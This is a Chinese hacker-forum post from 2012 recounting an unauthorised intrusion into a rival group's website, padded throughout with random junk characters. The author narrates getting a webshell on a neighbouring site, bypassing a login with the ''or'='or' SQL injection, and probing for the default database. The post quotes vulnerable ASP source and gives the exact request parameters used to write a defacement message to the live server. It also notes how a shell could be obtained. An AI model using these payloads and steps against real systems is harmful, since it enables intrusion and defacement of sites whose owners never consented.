|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量; q5 y. G' l9 ^6 J6 p1 S
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程: q" m5 v& n, z+ j! e6 w9 r
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来# v+ c3 J+ V3 L2 m
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东& h2 Y: k: A# I* H- G) k' C- a
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
; |8 @$ w9 W1 ~服务器应该防ARP,不过这还只是猜测$ l8 T2 [, R" Y; i
云中鸡说先不搞C段,PZ一下再说
4 R; u' q2 k! F, }' P2 [然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
4 v% Q3 U% a0 s7 ^ W* a一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............) w' j# Y2 J4 \% @% H) y
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
$ Q( X7 n4 P# C' B" M我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT; L! W' |( h8 K9 |/ Q
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn$ x( S- k% C! Q4 Q2 x
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
- q/ K+ Q$ Z' [- }问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
) }; Y) Q" ?$ e, r* ?" u6 X无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
3 c8 v( H' {$ l/ F( Y然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么 ~- F- j; @/ T+ B3 T
打开一看,如图1所示。
% w9 {7 h4 @. M( D
! O$ [7 ?0 K* E1 j4 ?7 ]$ W9 R http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg& B: J& i. K5 `: W
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
6 f2 ^7 [, u( g8 L2 l" X( K% @& L5 y
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
: e, K8 ^& ^9 s& A( g太帅了,真YD!!1 a! U5 ^6 X. l
这个页面应该是一套个人主页程序,而且还挺炫的!1 C# T( O7 d: c
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。5 A j0 r/ y z3 [: |
) v7 s; w. M" r# J( C. F4 m
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
9 d) z6 n, C2 F' u4 M嘿嘿,试着'or'='or'居然进去了!!如图4所示。
$ J3 W5 u/ r& p6 l( c& O' B
% \" {- @! d) s! u+ {9 K http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg$ t+ _+ D' K9 j* G* F
经过半个多小时的摸索,还是没有发现可利用的地方。$ {) I9 T3 k \9 _$ K2 [0 }
这下郁闷了,不管了,把这套程序下载下来看看吧" W5 o% z3 _, n ^! q) H- S
找了一会才知道这套程序叫做“V时代个人flash主页”
) r! D: N6 H' c+ l" ]到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用* ], ]2 ?: t# k
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]4 \/ q9 F" j, P# r- P f
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
$ }1 j! r7 l# N$ \$ L: v& b同样是找不到页面,真晕!再看看!
! A# d) ?+ u5 c [5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!$ k+ L6 C: X; j2 Q
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!" e$ W: [. D4 | L$ `
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
# I6 `( H* c$ E4 L1 r希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:1 i' ^0 A7 r$ e; M
$ I9 D; y# n* X! B* s0 J t* fvar a1 E) @5 v) s% X
var b
- T$ O) x6 }: Bvar tx
! ]1 s, M2 K9 _7 a2 M) U3 |7 }var clean* X8 n% J/ v5 y7 z" e2 S% t9 k4 @
a=Request("re")2 P9 g5 B5 J' S( \% Y; k
clean=Request("clean")
$ ^3 w1 b3 q) C+ Z+ h. ]; V8 Qvar jian="test.txt") d, g: U; s% d+ G+ N2 {/ i+ {& f
* s- h" [- u# z9 z) p* o" eif(clean==1){9 [5 K; a5 N8 a' e
tx="&a="$ g1 f& C# o& s6 ?) h
var fs2
; @) v# I4 j+ W8 I1 ?& \8 e$ zvar fs2=Server.CreateObject("Scripting.FileSystemObject")
& L% j6 s) M+ \8 w# Z) Y: Avar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
* Q! F9 c9 Q3 J' gnewdt.WriteLine("&a=")0 \3 E2 p: Q# Y8 i5 P4 U
newdt.close()* D! D/ x0 `" \1 E% C
}$ |5 X1 z, `# X7 b6 W8 f
" i$ A6 @4 z" M, z9 P" jif(clean==0|clean==1){4 w& b& e% p2 t9 O! f
tx=""9 j# D# B, l Z! S
var fso = Server.Createobject("Scripting.FileSystemObject")
9 T! t0 L( Z0 d8 }7 v, \) W' J) Xvar file = fso.OpenTextFile(Server.Mappath(jian))
9 d& f6 J- h, A, f) Vwhile (!file.AtEndOfStream){
" h* n" v' N8 i' I! i$ m! Ktx=file.ReadLine()8 f0 C9 G0 P L: M
Response.write (tx)8 v; D# d% \7 e" R$ i
}
2 e# O# |+ @1 T+ |3 DResponse.write ("&")
: G$ I8 F& K- N6 u. P2 tfile.close()" C/ w2 \' i3 p% H0 B
}
3 U! e4 V5 b2 H P- X2 J3 O0 ?
+ Q' L. u! j3 d- M. t% O( dif(clean==2){
& B: }) x$ _3 v! x9 E j. Ptx=""
) W2 ]3 V: `0 \$ g, e# Y" j0 S' cvar fso = Server.Createobject("Scripting.FileSystemObject")
g5 ]7 J+ f5 ?2 ~var file = fso.OpenTextFile(Server.Mappath(jian))( Q3 d* A4 I- F5 z1 \) r
! u# f* m& [0 H8 ~
var fs2 C3 @" i4 |" B* z
var fs2=Server.CreateObject("Scripting.FileSystemObject")9 z* r2 [6 I" U: g- v
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true); j. H* d3 T4 b; F
1 |) i7 c- R% t, e- {, V
7 j' O9 u- z& a! P. {- v, s5 s3 @4 Ywhile (!file.AtEndOfStream){
8 s0 V" ?; z7 p; Y/ O" X* atx=file.ReadLine()& m- h& B6 f, S! W6 m
Response.write (tx)}" h, r& F( x, W+ v/ L* z+ W
( R. u( w( L( x4 MResponse.write (a+"&")$ s# L. t* c* j0 S7 m7 e5 J4 d) O
newdt.WriteLine(a)
" `$ v1 D+ l3 M% p, k6 t0 [) U0 r) O3 P! H
file.close(). w1 d8 |; I& m; A
newdt.close()+ J6 |2 g5 U1 }' r
}
' w5 k) x' L- e3 l3 G/ Z1 V
9 i5 t( G+ `; m+ {) N; D$ K: |" l. }; c5 h' d: r
复制代码, Y& R4 Y# q2 p' C& y
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”1 |( N1 B% p4 f6 f6 u
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
7 i) ?" v9 h, O& R4 @, c这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话0 R! P. b' k/ Z
过程如图5、6所示。
7 [# ]7 P" Z$ J/ H/ X+ G7 y" N7 c- c6 m/ j
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg9 R+ a. _: }; z/ m5 n
+ J5 N7 P; U7 Y7 b: u# }. H http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg1 T+ _1 X- X! @0 }% G7 J
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
; r- E! \6 \- }; L# H' I% M: W8 o. m7 T: t0 J1 M H
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg7 u! @7 ?. c8 j1 V2 u
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
4 E0 T$ b6 m+ r如果jian是经过request取值的话,同样也能搞到shell。
0 z. w' w4 Q- O' z% X! B这次只是装到了X,并没有拿到shell( k6 w: i( n7 J7 F* g
已经是凌晨了,跟云中J说了声就睡觉去鸟! E$ {: B# Y0 B$ X* u$ U; j; y
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙6 F+ F9 M( `; A+ q1 z
就到这里吧,没技术含量,纯粹装X,高手们见笑了1 f" y* f& v4 i" y9 A8 \
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己3 j; W7 P3 ~1 o
自己学不到技术,却还在自欺欺人
- k4 q1 G" ?: F8 \' F8 e# j# p不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~ ]9 ? i4 ]* Y: n
* l' T& h5 J6 {8 u: @. S
|
|
发表于 2012-11-6 21:06:10
收藏
支持
反对